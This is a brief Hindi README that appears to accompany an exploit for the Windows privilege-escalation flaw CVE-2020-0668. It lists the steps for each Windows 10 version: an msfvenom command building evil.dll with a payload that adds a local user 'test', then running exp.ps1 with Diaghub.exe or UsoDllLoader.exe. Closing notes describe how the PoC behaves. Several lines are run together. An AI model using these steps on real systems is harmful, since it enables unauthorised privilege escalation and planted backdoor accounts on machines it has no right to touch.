
CVE-2020-0668 एक्सप्लॉइट को संस्करण < win10 v1903 और संस्करण >= win10 v1903 के लिए कार्यशील बनाएँ
CVE-2020-0668 एक्सप्लॉइट को संस्करण < win10 v1903 और संस्करण >= win10 v1903 के लिए काम करने योग्य बनाएं
powershell एक्सप्लॉइट Diaghub के साथ संस्करण < win10 v1903 पर काम करता है।
evil.dll जनरेट करें
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dllexp.ps1 निष्पादित करेंDiaghub.exe C:\ProgramData evil.dll निष्पादित करें।
powershell एक्सप्लॉइट UsoDllLoader के साथ संस्करण >= win10 v1903 पर काम करता है।
exp.ps1 निष्पादित करेंUsoDllLoader.exe निष्पादित करें
SysTracingPoc का x86 रिलीज़ संस्करण issue के लिए,एक्सप्लॉइट UsoLoadDll के कारण संस्करण >= win10 v1903 पर काम करता है।
एक .net PoC। यदि आप C:\Windows\System32\evil.dll को देखें और इसे evil.txt के रूप में नाम बदलें।
आप पाएंगे कि यह dll फ़ाइल नहीं है। इसमें केवल ट्रेसिंग लॉग है।
एक powershell PoC। evil.dll में भी केवल ट्रेसिंग लॉग है।